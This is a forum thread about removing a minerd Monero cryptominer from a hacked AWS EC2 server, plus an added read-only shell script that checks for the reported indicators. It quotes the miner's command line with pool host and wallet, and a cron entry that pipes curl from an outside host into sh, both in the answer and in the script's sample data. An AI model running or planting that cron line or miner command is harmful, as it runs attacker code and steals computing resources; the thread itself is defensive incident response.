How can I kill minerd malware on an AWS EC2 instance?

  • I have an AWS EC2 instance running RHEL 7.2 which seems to have been hacked by a BitCoin CPU Miner. When I run ps -eo pcpu,args --sort=-%cpu | head, it shows that there is a CPU miner that's taking up more than 90% of CPU utilization.

    %CPU COMMAND
    99.8 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8080 -u 47TS1NQvebb3Feq91MqKdSGCUq18dTEdmfTTrRSGFFC2fK85NRdABwUasUA8EUaiuLiGa6wYtv5aoR8BmjYsDmTx9DQbfRX -p x
    

    It also shows up when I run top -bn2 |sed -n '7,25'p -

      PID USER      PR  NI    VIRT    RES    SHR S %CPU %MEM     TIME+ COMMAND
    21863 root      20   0  237844   3300   1012 S 42.0  0.1   3:49.55 minerd
    

    I keep trying to remove minerd from /opt/ but it keeps spinning itself up again. Previously I had KHK75NEOiq33 and a yam directory. I was able to delete them but not minerd.

    How can I permanently remove this? I've also tried killing the PID individually with sudo kill -9 and sudo kill -2. Is there any antivirus that I can use to get rid of it?

    EDIT - The question was marked as a possible duplicate to another question. However, the difference is that I'm inquiring about a specific malware. I have found the solution to the question, which I will be posting below.

    This is why snapshots are important....

    @AndréBorie I'm trying to be really specific with the type of malware unlike the question you mentioned. I've already taken a few security measures such as restricting the SSH to my IP. I'm really looking for a way to kill this `minerd` malware.

    @AnishSana once the malware is on the server you do not simply "kill" the malware, you reinstall the server. Otherwise you put yourself, your company and your customers at risk because there is no way to be sure that you really "killed" the malware.

    FWIW here's a similar issue, albeit a different mining process: http://unix.stackexchange.com/questions/129035/have-i-been-hacked seems to have some useful links in the answers

  • Anish Sana (correct answer, 5 years ago)

    I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script -

    1. On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
    2. Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
    3. Removed the directory /opt/yam.
    4. Removed /root/.ssh/KHK75NEOiq.
    5. Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
    6. Stopped the minerd process - pkill minerd.
    7. Stopped lady - service lady stop.

    I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.

    I still need to figure out how it gained access into the system but I was able to disable it this way.

    Now that the attackers know that you have detected them, that you have ruthlessly shut down their proggie (you killed the fruit of their job!), but that you still left their initial access door open, chances are that they will come back for revenge and either be more furtive, or devastating, or both, as they please... or maybe you're lucky and they are too busy somewhere else, you never know. On my side, the last time I informed a webmaster that his website was hacked, I started to have people trying to break into my mailbox for two months, just to let you know...

    @WhiteWinterWolf That's a fair suggestion. I don't understand why my solution to the problem had to be down-voted though? It obviously works since I was able to disable `minerd`, and it is possibly a fix for someone who encounters the same problem?

    If you ask me, it is not me who down-voted your answer.

    @AnishSana did you investigate how it got in? I have an affected ec2 instance which I maintained with high hygiene. I've no clue how it got infected.

    Same thing happened to my server. In my case, the cause was likely redis (I didn't set a password).

    @AnishSana Thank you for your answer. You saved my day.
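The question ("it keeps spinning itself up again") and the accepted answer together describe the persistence chain: a `curl ... | sh` cron entry that re-downloads the miner, the dropped files under `/opt` and `/root/.ssh`, a service named `lady`, and the `minerd` process itself. The script below is an added example written for this page, not code from the question, the answer, or any tool named there. It is a read-only triage helper that checks for exactly those indicators under a root prefix, so it can be run against a constructed sample tree (built by `build_sample_tree`, labelled as constructed data) or against `/` on a live host. The file paths, cron line, pool host and service name are the ones the answer reports; the SysV and systemd unit locations checked for `lady` are standard RHEL 7 paths and are an assumption, not something the page states.

```shell
#!/bin/sh
# Added example for this page (not from the question, answer or any project).
# Read-only triage for the persistence indicators the accepted answer lists.
# Paths, cron pattern and service name come from the page; the systemd/SysV
# locations are standard RHEL 7 paths (assumption).

# Report crontab lines that pipe a downloader into a shell (the page's entry
# is "*/15 * * * * curl -fsSL ... | sh"). $1 = crontab file. Exit 0 = found.
find_download_pipe_cron() {
    [ -r "$1" ] || return 1
    grep -En '(curl|wget)[^|]*[|][[:space:]]*(sh|bash)' "$1"
}

# Print each dropped-file indicator from the answer that exists under root $1.
# Exit 0 = at least one present.
ioc_paths_present() {
    root="${1:-/}"; found=0
    for rel in opt/minerd opt/KHK75NEOiq33 opt/yam root/.ssh/KHK75NEOiq; do
        if [ -e "$root/$rel" ]; then
            echo "$root/$rel"
            found=$((found + 1))
        fi
    done
    [ "$found" -gt 0 ]
}

# The answer stopped a service called "lady". Look for a unit or init script of
# that name in the standard locations (assumed RHEL 7 layout). Exit 0 = found.
service_persistence() {
    root="${1:-/}"; name="${2:-lady}"; found=0
    for rel in "etc/init.d/$name" "etc/systemd/system/$name.service" \
               "usr/lib/systemd/system/$name.service"; do
        if [ -e "$root/$rel" ]; then
            echo "$root/$rel"
            found=$((found + 1))
        fi
    done
    [ "$found" -gt 0 ]
}

# Print PIDs of processes whose command name matches $1 (default minerd).
# Exit 0 = running. Uses POSIX ps field selection, so no pgrep is needed.
miner_process_running() {
    ps -eo pid=,comm= | awk -v name="${1:-minerd}" \
        '$2 == name { found = 1; print $1 } END { exit !found }'
}

# Run every check under root $1 and count indicator groups. Exit 0 = clean.
triage_report() {
    root="${1:-/}"; hits=0
    echo "== dropped files under $root"
    if ioc_paths_present "$root"; then hits=$((hits + 1)); fi
    echo "== service persistence (lady)"
    if service_persistence "$root" lady; then hits=$((hits + 1)); fi
    echo "== download-and-pipe cron entries"
    for crontab in "$root/var/spool/cron/root" "$root/var/spool/cron/crontabs/root"; do
        if find_download_pipe_cron "$crontab"; then hits=$((hits + 1)); fi
    done
    echo "== miner process"
    if miner_process_running minerd; then hits=$((hits + 1)); fi
    echo "indicator groups found: $hits"
    [ "$hits" -eq 0 ]
}

# Constructed sample tree (test data, not a capture) carrying the page's
# indicators, so the checks can be exercised offline. Prints its path.
build_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/opt/yam" "$root/root/.ssh" "$root/var/spool/cron/crontabs" "$root/etc/init.d"
    : > "$root/opt/minerd"
    : > "$root/opt/KHK75NEOiq33"
    : > "$root/root/.ssh/KHK75NEOiq"
    : > "$root/etc/init.d/lady"
    printf '%s\n' \
        '0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf' \
        '*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh' \
        > "$root/var/spool/cron/root"
    echo "$root"
}

# Stand-alone demo against the constructed tree; pass "/" to examine a live host.
demo=$(build_sample_tree)
triage_report "$demo"
rm -rf "$demo"
```

The script only reports; it changes nothing. Its value is in ordering the answer's steps for a host where the miner keeps returning: the cron entry is what re-fetches the miner, so that finding is the one to act on before killing the process, and a clean report afterwards still says nothing about how the initial access happened, which is the point the comments above make about rebuilding.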

License under CC-BY-SA with attribution


Content dated before 7/24/2021 11:53 AM